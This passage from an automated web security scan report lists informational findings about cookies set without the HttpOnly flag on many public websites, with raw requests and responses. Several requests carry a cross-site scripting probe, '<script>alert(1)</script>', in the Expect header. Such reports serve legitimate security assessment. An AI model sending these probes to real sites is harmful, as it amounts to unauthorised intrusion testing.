bklc=4dc02217; expires=Thu, 05-May-2011 15:41:11 GMT; path=/; domain=.bluekai.com
bk=tMvwQzV5c/WBvF/1; expires=Sun, 30-Oct-2011 15:41:11 GMT; path=/; domain=.bluekai.com
bkc=KJpM8sJQter5QDazbR9F/y1e90Kx72v1075LxmVeSOC4MoKO/DvPWRUdHQNPwGRayz2kHmDe9aNhW1W=; expires=Sun, 30-Oct-2011 15:41:11 GMT; path=/; domain=.bluekai.com
bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101HjUmr9n9WEZOjW=; expires=Sun, 30-Oct-2011 15:41:11 GMT; path=/; domain=.bluekai.com
bkst=KJhMRjeMjVeQRxMv5eqnBYoy2MWmEHJUmr9n9Yb+OEG=; expires=Sun, 30-Oct-2011 15:41:11 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.120. http://www.3stepads.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.3stepads.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

__cfduid=dca429cd02b061d92126feaaf92608be71304420966; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.3stepads.com
__cfduid=dca429cd02b061d92126feaaf92608be71304420966; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.www.3stepads.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.3stepads.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

13.121. http://www.accu-chek.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.accu-chek.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

dialogue_id=adc1d6f3201105037caeb514; path=/; expires=Sat, 25-Oct-19 16:10:20 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.accu-chek.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:36:58 GMT
Server: IBM_HTTP_Server/6.1.0.23 Apache/2.0.47 (Unix) PHP/5.3.3 mod_jk/1.2.28
Set-cookie: dialogue_id=adc1d6f3201105037caeb514; path=/; expires=Sat, 25-Oct-19 16:10:20 GMT
Last-Modified: Thu, 14 Oct 2010 14:34:12 GMT
ETag: "282be4-57e-9a840100"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: image/x-icon

..............h.......(....... ...................................................geg.............! %.wuv...".........................................trs.][].%$(.................mkl.....}{{.....JHK...
...[SNIP]...

13.122. http://www.aiche.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aiche.org
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&dm=www.aiche.org&SiteLanguage=1033; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aiche.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:40:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&dm=www.aiche.org&SiteLanguage=1033; path=/
Set-Cookie: ASP.NET_SessionId=1qo52qnojyc1dbvm4n32cl55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 93008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML>
<head><title>
AIChE - Sitemap
</title><meta http-equiv="Content
...[SNIP]...

13.123. http://www.aionarmory.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aionarmory.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServer=2033139780.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aionarmory.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: BIGipServer=2033139780.20480.0000; path=/
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:17:35 GMT
Xonnection: close
Content-Length: 60

The page cannot be displayed because the expectation failed.

13.124. http://www.allentate.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.allentate.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Coyote-2-42a2c514=42a2c505:0;Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.allentate.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 1150
Content-Type: image/x-icon
Last-Modified: Tue, 11 May 2010 14:38:58 GMT
Accept-Ranges: bytes
ETag: "2867bdb017f1ca1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:36:21 GMT
Set-Cookie: Coyote-2-42a2c514=42a2c505:0;Path=/

............ .h.......(....... ..... ............................................3........f...b...}..........3...........................
....Z...6S...$...... ...... 4..t..........
...............
..
...[SNIP]...

13.125. http://www.americaneducationnetwork.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.americaneducationnetwork.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PSGUID=cb16b142-18fb-485d-b3c1-1491a6862fec; expires=Thu, 02-Jun-2011 10:25:18 GMT; path=/
Recipe-=,default,,; expires=Wed, 04-May-2011 10:25:18 GMT; path=/
BIGipServerWEBFX-1=2483174410.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.americaneducationnetwork.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: http://media.americaneducationnetwork.com/i/favicon.ico
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ublbj5iwkvwnjyvcuyacvo55; path=/; HttpOnly
Set-Cookie: PSGUID=cb16b142-18fb-485d-b3c1-1491a6862fec; expires=Thu, 02-Jun-2011 10:25:18 GMT; path=/
Set-Cookie: Recipe-=,default,,; expires=Wed, 04-May-2011 10:25:18 GMT; path=/
X-AspNet-Version: 2.0.50727
Server-Name: MIS-WEB90B
P3P: CP="CAO PSA OUR"
Date: Tue, 03 May 2011 10:25:17 GMT
Content-Length: 0
Set-Cookie: BIGipServerWEBFX-1=2483174410.20480.0000; path=/

13.126. http://www.ashop.com.au/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ashop.com.au
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SD=CBC79EF83B2840399EF683813BFC9F01; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ashop.com.au
Accept: */*
Proxy-Connection: Keep-Alive

Response

13.127. http://www.asme.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.asme.org
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CMSPreferredCulture=en-US; expires=Thu, 03-May-2012 10:38:54 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.asme.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Microsoft-IIS/7.5
Set-Cookie: CMSPreferredCulture=en-US; expires=Thu, 03-May-2012 10:38:54 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:38:53 GMT
Content-Length: 0

13.128. http://www.ataglance.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ataglance.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_nxw_bubhmbodf_qspe_tubujd_mc=ffffffff09c939a745525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ataglance.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:31:18 GMT
Server: Web Server 1.0
Content-Length: 209
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_nxw_bubhmbodf_qspe_tubujd_mc=ffffffff09c939a745525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
</body
...[SNIP]...

13.129. http://www.autozonepro.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autozonepro.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_dt-bvupapofqsp=e79536a33660;Version=1;Max-Age=7200;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.autozonepro.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:32:05 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP08 (build: SVNTag=JBPAPP_4_3_0_GA_CP08 date=201004202136)/JBossWeb-2.0
Last-Modified: Thu, 28 Apr 2011 15:10:30 GMT
Content-Length: 3262
Vary: Accept-Encoding
Cache-Control: max-age=43200, public, must-revalidate
Content-Type: text/plain; charset=UTF-8
Set-Cookie: NSC_dt-bvupapofqsp=e79536a33660;Version=1;Max-Age=7200;path=/

...... ..............(... ...@.........................................................................................................................................................................
...[SNIP]...

13.130. http://www.awardhq.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.awardhq.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpool_p_www.awardhq.com_all=571320512.0.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.awardhq.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:23:28 GMT
Set-Cookie: BIGipServerpool_p_www.awardhq.com_all=571320512.0.0000; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

13.131. http://www.bcbsga.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bcbsga.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerwww_bcbsga_com_http_pool=2823886534.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bcbsga.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Tue, 03 May 2011 11:35:13 GMT
Server: IBM_HTTP_Server
Location: http://www.bcbsga.com/bcbsga404.html
Content-Length: 220
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerwww_bcbsga_com_http_pool=2823886534.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bcbsga.com/bcbsga404.html">here</a>.
...[SNIP]...

13.132. http://www.bfcu.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bfcu.org
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Apache=173.193.214.243.1304420598988399; path=/; expires=Fri, 30-Apr-21 11:03:18 GMT; domain=.bfcu.org

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bfcu.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

13.133. http://www.bhgrealestate.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bhgrealestate.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServervip_64.37.197.236_http=3442093834.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bhgrealestate.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Length: 894
Content-Type: image/x-icon
Content-Location: http://www.bhgrealestate.com/favicon.ico
Last-Modified: Tue, 13 Jan 2009 17:26:38 GMT
Accept-Ranges: bytes
ETag: "09b2217a475c91:131c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:21:41 GMT
Set-Cookie: BIGipServervip_64.37.197.236_http=3442093834.20480.0000; path=/

..............h.......(....... ..........................................................................................................................................9.A...............}..<.B......
...[SNIP]...

13.134. http://www.bigtitcreampie.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigtitcreampie.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

psinfo=bbonet%7Cbigtitcreampie%7C1%7Cpps%7C%7C%7C%7C%7C%7C%7C%7C%7Cus; expires=Thu, 02-Jun-2011 11:31:31 GMT; path=/; domain=.bigtitcreampie.com
psextra=173.193.214.243%7COK%3B%7C; expires=Thu, 02-Jun-2011 11:31:31 GMT; path=/; domain=.bigtitcreampie.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bigtitcreampie.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

13.135. http://www.bloomu.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bloomu.edu
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

LBSRVwww=KRXUOUScassiniCKOLI; domain=.bloomu.edu; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.136. http://www.bucknell.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bucknell.edu
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARPT=KUWJLWS134.82.9.41CKKYY; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bucknell.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=KUWJLWS134.82.9.41CKKYY; path=/
Connection: close
Date: Tue, 03 May 2011 10:20:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmln
...[SNIP]...

13.137. http://www.buymebeauty.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.buymebeauty.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

chkvalues=t3n5l5LpU8CKJsU7zpKtJdSkarpRCVZ+gUqFXAn6DFSefdit4/O/b5+cVBCNqTzD; expires=Sun, 30-Oct-2011 11:38:11 GMT; path=/
chkvalues=t3n5l5LpU8CKJsU7zpKtJdSkarpRCVZ+gUqFXAn6DFSefdit4/O/b5+cVBCNqTzD; expires=Sun, 30-Oct-2011 11:38:11 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.buymebeauty.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Date: Tue, 03 May 2011 11:38:11 GMT
Content-Length: 27428
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: anonymousID=OL3yZviWzAEkAAAAYzc3YmJlZjQtZDJhYy00ZTk0LWJhMDAtODQ2MWUzZDcyNDI4DTLpvY8b8ZA2A1KR6Tg9nsP9vt81; expires=Sun, 30-Oct-2011 11:38:11 GMT; path=/; HttpOnly
Set-Cookie: chkvalues=t3n5l5LpU8CKJsU7zpKtJdSkarpRCVZ+gUqFXAn6DFSefdit4/O/b5+cVBCNqTzD; expires=Sun, 30-Oct-2011 11:38:11 GMT; path=/
Set-Cookie: .ASPXAUTHSF=; expires=Tue, 12-Oct-1999 04:00:00 GMT; path=/; HttpOnly
Set-Cookie: chkvalues=t3n5l5LpU8CKJsU7zpKtJdSkarpRCVZ+gUqFXAn6DFSefdit4/O/b5+cVBCNqTzD; expires=Sun, 30-Oct-2011 11:38:11 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_headTag"><titl
...[SNIP]...

13.138. http://www.bvonstyle.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bvonstyle.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Tue, 03-May-2011 12:05:43 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bvonstyle.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

13.139. http://www.cafe.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafe.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

guest=-15688467; domain=.cafe.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
lastaction=5/3/2011 11:38:44 AM; domain=.cafe.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
AWSELB=4B9F6D83168D6A48ED28A11AEA43DBB45031A1E282F5DC944339ADEFFF5D1448E1E4B0ECC696BAE3C2F5CF51C81BEFA1879A91BE6C5E02B5DBFEF7B8ED5BA7819C73AAEEC3;PATH=/;MAX-AGE=300

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cafe.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

13.140. http://www.cbmove.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbmove.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cbmove.com=R2551114660; path=/; expires=Tue, 03-May-2011 13:28:31 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cbmove.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Set-Cookie: cbmove.com=R2551114660; path=/; expires=Tue, 03-May-2011 13:28:31 GMT
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:17:40 GMT
Content-Length: 1245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

13.141. http://www.charter-business.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.charter-business.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerCharterBusiness_WebTier=1182574784.0.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.charter-business.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Tue, 03 May 2011 10:16:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /home.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 129
Set-Cookie: BIGipServerCharterBusiness_WebTier=1182574784.0.0000; path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fhome.aspx">here</a>.</h2>
</body></html>

13.142. http://www.chefuniforms.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.chefuniforms.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Coyote-2-a6b6422=a6b645e:0; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.chefuniforms.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: image/x-icon
Last-Modified: Fri, 30 May 2008 17:55:15 GMT
Accept-Ranges: bytes
ETag: "1227c507ec2c81:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:02:07 GMT
Content-Length: 1406
Set-Cookie: Coyote-2-a6b6422=a6b645e:0; path=/

..............h.......(....... ...................................PPP......bbb.""".DDD.....CCC.........................333.ooo.###.........```.444.........sss.............222.SSS.ppp...............
...[SNIP]...

13.143. http://www.cityofheroes.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cityofheroes.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS7a7a29=48a7b013a5cb39e2773fd528d82d89a3b4b54904582944c74dbfea18; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cityofheroes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:42:16 GMT
Last-Modified: Fri, 28 Oct 2005 05:52:14 GMT
ETag: "2d85ed-57e-175dbf80"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: text/plain
Set-Cookie: TS7a7a29=48a7b013a5cb39e2773fd528d82d89a3b4b54904582944c74dbfea18; Path=/

..............h.......(....... ...........@...........................@@...@@.............pp...... ...__.....__..................??....................................................................
...[SNIP]...

13.144. http://www.click-now.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.click-now.net
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_downloadBarCom=a3363fe1cf8e5323c49a3258eb0d0cef; path=/
_downloadBarCom=12214117dd98b727f887a61691eb8a7f; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.click-now.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

13.145. http://www.clickmycredit.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.clickmycredit.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_iuuq_dmjdlnzdsfeju.dpn=ffffffff0909330b45525d5f4f58455e445a4a423660;expires=Tue, 03-May-2011 11:34:11 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.clickmycredit.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:32:11 GMT
Set-Cookie: NSC_iuuq_dmjdlnzdsfeju.dpn=ffffffff0909330b45525d5f4f58455e445a4a423660;expires=Tue, 03-May-2011 11:34:11 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

13.146. http://www.coloniallife.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.coloniallife.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BlueStripe.PVN=4c4000052c1; path=/

